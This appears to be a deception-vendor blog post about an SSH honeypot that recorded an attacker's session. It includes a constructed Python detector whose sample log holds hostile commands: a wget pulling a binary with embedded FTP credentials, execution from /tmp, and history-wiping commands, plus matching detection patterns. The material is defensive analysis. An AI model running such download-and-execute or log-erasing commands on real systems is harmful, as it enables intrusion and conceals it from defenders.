This past week, a MazeRunner Community Edition user, named Antonio, reached out to Cymmetria and asked us to help him deploy MazeRunner in his network. One of our developers worked with Antonio to help him get everything set up to his liking; this included helping him build his first deception campaign, which included two Internet-facing SSH decoys.
Within two days of launching his campaign, Antonio reached out to us again to say he had been receiving a lot of code execution alerts (this is quite common with Internet-facing decoys, and it can be difficult to separate relevant alerts from irrelevant ones). We asked him to export this data from MazeRunner and send it to us for review. When reviewing Antonio’s alert data, our developer could clearly see attempted attacks on both decoys. The attack data showed that, on the first decoy, the attacker uploaded an unknown executable to /tmp and executed it. We detected this behavior using our unsigned code execution detection technique. A search conducted by our researchers seems to indicate that this executable had never before been observed in any other public database (for example, VirusTotal).
On the second decoy, our developer could see the attacker’s initial connection and that they ran some standard tools. Next, the attacker executed a ‘wget’ command to download an executable from a remote FTP server; because the attacker embedded the username and password for their C&C server in the ‘wget’ command, MazeRunner recorded those FTP credentials and exposed them to us as well. (We should note that we were able to discern that the attacker is human and not a bot by looking at the commands’ timestamps.) Trying to cover their tracks, the attacker then ran commands like ‘history -c’ and ‘export HISTFILE=/dev/null’ to delete their command history; however, MazeRunner decoys are fully instrumented forensic devices that record data in real time, so the attack data had already been recorded and saved.
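The kind of analysis described above, run over a recorded decoy session, as an added example that is not Cymmetria's or MazeRunner's code: it parses a constructed command log, flags downloads and execution from /tmp, flags history-clearing commands, pulls credentials embedded in a download URL (masking the password), and uses inter-command timing as a rough human-versus-bot heuristic. The log format, the sample commands, the hosts and credentials, and the timing threshold are all assumptions made for this example; the real product's unsigned code execution detection is not reproduced here.

```python
import re
from datetime import datetime

# Constructed sample of what an instrumented SSH decoy might record:
# one command per line, "ISO-timestamp<TAB>user<TAB>command".
# This is an invented format and invented data, not a MazeRunner export.
SAMPLE_LOG = """\
2016-07-01T10:02:11Z\troot\tuname -a
2016-07-01T10:02:19Z\troot\tcat /proc/cpuinfo
2016-07-01T10:02:34Z\troot\tcd /tmp
2016-07-01T10:03:02Z\troot\twget ftp://hacker:s3cret@198.51.100.23/x86 -O /tmp/x86
2016-07-01T10:03:20Z\troot\tchmod +x /tmp/x86
2016-07-01T10:03:25Z\troot\t/tmp/x86
2016-07-01T10:03:41Z\troot\thistory -c
2016-07-01T10:03:44Z\troot\texport HISTFILE=/dev/null
"""

# Constructed scripted session: every command lands in the same second.
BOT_LOG = """\
2016-07-01T11:00:00Z\troot\tuname -a
2016-07-01T11:00:00Z\troot\tcat /proc/cpuinfo
2016-07-01T11:00:00Z\troot\tcd /tmp
"""

# Patterns a defender wants flagged in a recorded session.
ANTI_FORENSICS = [
    re.compile(r"^\s*history\s+-c\b"),            # clears the in-memory history
    re.compile(r"\bHISTFILE\s*=\s*/dev/null\b"),  # stops history being written
    re.compile(r"\bunset\s+HISTFILE\b"),
]
DOWNLOADERS = re.compile(r"^\s*(wget|curl)\b")
# A path under /tmp or /dev/shm in command position (start of line or after ; & |).
EXEC_FROM_TMP = re.compile(r"(^|[;&|]\s*)(/tmp|/dev/shm)/\S+")
# scheme://user:password@host  -- credentials embedded in a URL
CRED_IN_URL = re.compile(r"\b(\w+)://([^/\s:@]+):([^/\s@]+)@([^/\s]+)")


def parse_log(text):
    """Turn the tab-separated log into a list of {ts, user, cmd} dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, cmd = line.split("\t", 2)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user,
            "cmd": cmd,
        })
    return events


def analyze(events):
    """Return (kind, detail) findings for each suspicious command."""
    findings = []
    for e in events:
        cmd = e["cmd"]
        if any(p.search(cmd) for p in ANTI_FORENSICS):
            findings.append(("anti_forensics", cmd))
        if DOWNLOADERS.search(cmd):
            findings.append(("download", cmd))
            m = CRED_IN_URL.search(cmd)
            if m:
                scheme, user, password, host = m.groups()
                # Keep the username and host for the analyst; mask the password.
                masked = f"{scheme}://{user}:{'*' * len(password)}@{host}"
                findings.append(("exposed_credentials", masked))
        if EXEC_FROM_TMP.search(cmd):
            findings.append(("exec_from_tmp", cmd))
    return findings


def inter_command_gaps(events):
    """Seconds between consecutive commands."""
    return [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(events, events[1:])]


def looks_interactive(events, min_median_gap=2.0):
    """Heuristic (an assumption of this example): a human types with irregular,
    multi-second pauses; scripted sessions fire commands back-to-back."""
    gaps = inter_command_gaps(events)
    if not gaps:
        return False
    median = sorted(gaps)[len(gaps) // 2]
    return median >= min_median_gap and len(set(gaps)) > 1


if __name__ == "__main__":
    session = parse_log(SAMPLE_LOG)
    for kind, detail in analyze(session):
        print(f"{kind:20s} {detail}")
    print("interactive:", looks_interactive(session))
    print("bot session interactive:", looks_interactive(parse_log(BOT_LOG)))
```

The findings are ordered as they occur in the session, so an analyst reads them as the attacker's storyline: download (with the credentials the attacker leaked), execution from /tmp, then the attempt to wipe history. Because the decoy wrote every line as it happened, the ‘history -c’ at the end changes nothing about what was already captured.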
[Figure: Alerts log detailing attack activity]
The result? We were able to detect the threat using the code signing technology that we developed in-house. MazeRunner caught the attacker, revealed their tools, and detailed their movement and actions. Even though the attacker covered their tracks by erasing their command history, MazeRunner was one step ahead.